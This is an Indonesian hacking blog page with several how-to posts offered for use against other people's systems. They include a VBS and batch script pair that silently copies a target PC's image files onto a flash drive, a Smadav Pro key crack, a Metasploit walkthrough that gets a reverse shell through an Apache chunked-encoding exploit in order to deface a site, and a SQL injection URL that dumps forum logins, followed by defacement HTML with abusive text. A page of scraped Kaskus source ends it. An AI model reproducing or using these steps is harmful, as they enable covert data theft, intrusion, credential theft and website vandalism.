Rules

spacer is free blog or a community in cyberspace. spacer forum is a forum of free speech, berkritik or convey a message

This is default featured post 2 title

spacer is free blog or a community in cyberspace. spacer forum is a forum of free speech, berkritik or convey a message

This is default featured post 3 title

spacer is free blog or a community in cyberspace. spacer forum is a forum of free speech, berkritik or convey a message

This is default featured post 4 title

spacer is free blog or a community in cyberspace. spacer forum is a forum of free speech, berkritik or convey a message

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

COPY DATA KE FLASHDISK SECARA DIAM-DIAM

Trik Copy Data Ke Flash Disk Secara Diam-diam
1.Buka notepad, buat file vbs ketik atau copy paste script berikut:

dim wshshell, dos
set wshshell = wscript.createobject("wscript.shell")
dos = wshshell.expandenvironmentstrings("%coms...
wshshell.run (dos & " /c tarik.bat"), vbhide

2.Simpan dengan file name nya contoh start.vbs save as typenya pilih all files

3.Buka notepad lagi, buat file bat ketik atau copy paste script berikut:

@echo off
mkdir %computername%
xcopy "C:\Documents and Settings\%username%\My Documents\*.jpg" %computername% /s/c/q/r
@cls
@exit

4.Simpan dengan file name nya contoh tarik.bat save as typenya pilih all files.
Nama file bat ini harus sesuai dengan script file vbs baris ke empat (tarik.bat)

Simpan kedua file tersebut didalam flash disk, Untuk copy file komputer target secara diam-diam jalankan (2x klik) file start.vbs.

Fungsi file vbs (start.vbs) berfungsi untuk menjalankan file bat (tarik.bat) secara diam-diam atau istilahnya background proses. Sedangkan file bat (tarik.bat) berfungsi untuk menjalankan perintah copy semua file dengan ektensi tertentu yang ada dikomputer target.

Contoh tersebuat diatas adalah copy semua file yang berektensi jpg (file gambar) yang ada di folder MyDocuments di komputer target (lihat baris ketiga script file bat) Dan disimpan kedalam flash disk ke dalam folder dengan nama sesuai nama komputer target. anda bisa meng edit sendiri kedua file tsb diatas sesuai keperluan format file dan folder target yg akan di copy.

Credit: sadoelan

Membuat Key Smadav Pro

Sekarang Saya Berikan tutorial cara membuat Key Smadav 8.x secara Pro
Di Anjurkan Klo mau Pro mending Donasi aja yah...

Di Baca-baca dlu informasi dari antivirus smadav...

Smadav 2011 Rev. 8 dirilis dengan berbagai fitur dan penyempurnaan baru yang dikhususkan untuk pemberantasan virus lokal. Fitur-fitur itu seperti Smad-Behavior yang bisa mengenali virus lokal baru yang belum ada di database Smadav dari tingkah lakunya ketika menginfeksi sistem. Smad-Ray yang bisa melakukan scan flashdisk secara otomatis setelah terpasang hanya dalam waktu maksimum 5 detik. Smadav 2011 lebih stabil dan sangat disarankan untuk digabungkan dengan antivirus internasional karena Smadav hanya bisa menangani virus lokal. Pengebalan flashdisk (menggunakan folder autorun.inf) telah disempurnakan lagi dan sebelumnya akan ada konfirmasi sehingga Anda bisa memutuskan apakah suatu flashdisk ingin dikebalkan atau tidak.

Sebagai informasi, dari sampel-sampel virus yang di-upload pengguna ke situs Smadav.net, penyebaran virus lokal saat ini sudah mulai turun drastis di Indonesia. Mungkin ini dikarenakan sudah banyaknya antivirus lokal yang bisa membasmi virus-virus lokal. Dan juga karena pengguna Windows XP yang sudah berkurang karena sebagian sudah meng-upgrade sistem operasinya menjadi Windows Vista atau Windows 7 yang sangat aman dari infeksi virus khususnya virus lokal. Penyebaran virus di Indonesia lebih banyak didominasi oleh virus dan malware internasional yang tentunya tidak bisa diatasi Smadav. Anda wajib dan sangat disarankan menggunakan antivirus internasional untuk perlindungkan komputer Anda dari virus dan malware internasional ini.

Caranya Tinggal Download aja yah...
DOWNLOAD

Cara Masukin Name yg benar
- AatShadewa
- aatshadewa

Cara Masukin Name yg salah
- Aat Shadewa
- Aat_shadewa
- Pokonya Di coba aja dch salah benernya...

Semoga Bermanfaat....

Defacing Menggunakan Metasploits with backtrack

langsung saja pada intinya mohon maaf bila ada kesalahan

masuk ke konsole lalu ketik msfconsole

langkah kedua setelah masuk ke msf console

msf > show exploits

Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow

Jadi disini kita bisa melihat daftar exploit pada Metasploit (penulis: maaf saya ringkas saja). salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32

Sekarang ketik perintah exploit dibawah ini:

msf > use apache_chunked_win32

msf apache_chunked_win32 >

Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:

msf apache_chunked_win32 > show options

Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------- ------------------
optional SSL Use SSL
required RHOST The target address
required RPORT 80 The target port
Target: Windows NT/2K Brute Force

msf apache_chunked_win32 >

Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini:

msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >

Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

msf apache_chunked_win32 > show payloads

Metasploit Framework Usable Payloads
====================================
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_ie Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
msf apache_chunked_win32 >

Ehm! Pilihan yang bagus bukan? Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.

Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini sintak-nya:

msf apache_chunked_win32 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf apache_chunked_win32(win32_reverse) >

Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:


msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf apache_chunked_win32(win32_reverse) >

Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
Starting Reverse Handler.
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
Got connection from 192.168.1.101:1031

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Apache Group\Apache>


Nah Kita sudah Masuk tuh Ke shell webservernya target........

kita mau apain aja terserah.....


pesan : defacing adalah menggati halaman utama tetapi jangan menghapus...........
Defacing bukan kegiatan untuk merusak tetapi untuk memberitahukan kelemahan
web tersebut....

deface forum buat pemula

nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini

langsung ya

Ketik di google
inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.***spoiler***.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.***spoiler***.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users

Hingga menjadi seperti ini
http://www.***spoiler***.net/forum/forums ... from+users


Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.

Hmm......
Jika ingin menutup full seluruh halaman, pake code berikut

<DIV align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white"><center>
<br><b><font face="papyrus" color="red" size="5">Attacked by : Ichito-Bandito</font></h2><br><br><img src="http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg" ><br><br>
<font face="papyrus" color="red" size="5">FUCK Malaysial and ASSOCIATE</a><br><br>
<font face="papyrus" color="red" size="5">We Are Ready to Cybernetic Wars</font><br><br><font color="red" size="3">Hackers-center In Here
</DIV>



kalo mau di tambah lagu juga bisa:
: <embed src="Url Lagu" autoplay="true" hidden="true"></embed>

Jangan lupa di edit dulu kataƂ² nya !!!

Trus klik tombol post....
Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi.

Nih Kode Source Kaskus

Buat Yang Ngerti Source aja ya. 
 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>THE LOUNGE - Page 3 - Kaskus - The Largest Indonesian Community</title>


<link rel="stylesheet" href="newkaskusstyles/kaskusforumglobal.css?v=031" type="text/css"/>
<link rel="stylesheet" href="newkaskusstyles/kaskusbluestyle.css?v=031" type="text/css"/>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta name="generator" content="vBulletin 3.8.0" />

<meta name="keywords" content="THE LOUNGE, kaskus,forum,indonesia,kaskuser,kaskusradio,radio,indo" />
<meta name="description" content="Page 3-Talk with other Kaskus's members. New user can meet with Kaskusers here too." />


<!-- CSS Stylesheet -->
<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.8.0 CSS
* Style: 'Kaskus Network Community vBulletin 3 Style'; Style ID: 1
*/
body
{
 background: #E1E1E2;
 color: #000000;
 font: 10pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 margin: 0px 0px 0px 0px;
}
a:link, body_alink
{
 color: #22229C;
}
a:visited, body_avisited
{
 color: #22229C;
}
a:hover, a:active, body_ahover
{
 color: #FF4400;
}
.page
{
 background: #E1E1E2;
 color: #000000;
}
td, th, p, li
{
 font: 10pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.tborder
{
 background: #D1D1E1;
 color: #000000;
 border: 1px solid #0B198C;
}
.tcat
{
 background: #869BBF url(images/gradients/gradient_tcat.gif) repeat-x top left;
 color: #FFFFFF;
 font: bold 10pt verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.tcat a:link, .tcat_alink
{
 color: #ffffff;
 text-decoration: none;
}
.tcat a:visited, .tcat_avisited
{
 color: #ffffff;
 text-decoration: none;
}
.tcat a:hover, .tcat a:active, .tcat_ahover
{
 color: #FFFF66;
 text-decoration: underline;
}
.thead
{
 background: #5C7099;
 color: #FFFFFF;
 font: bold 10px tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.thead a:link, .thead_alink
Maav Ukuran Font Kecil. Coba Copas Aja Pake ctrl+C

How Many Online

Sponsored By

Free SEO Tools

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More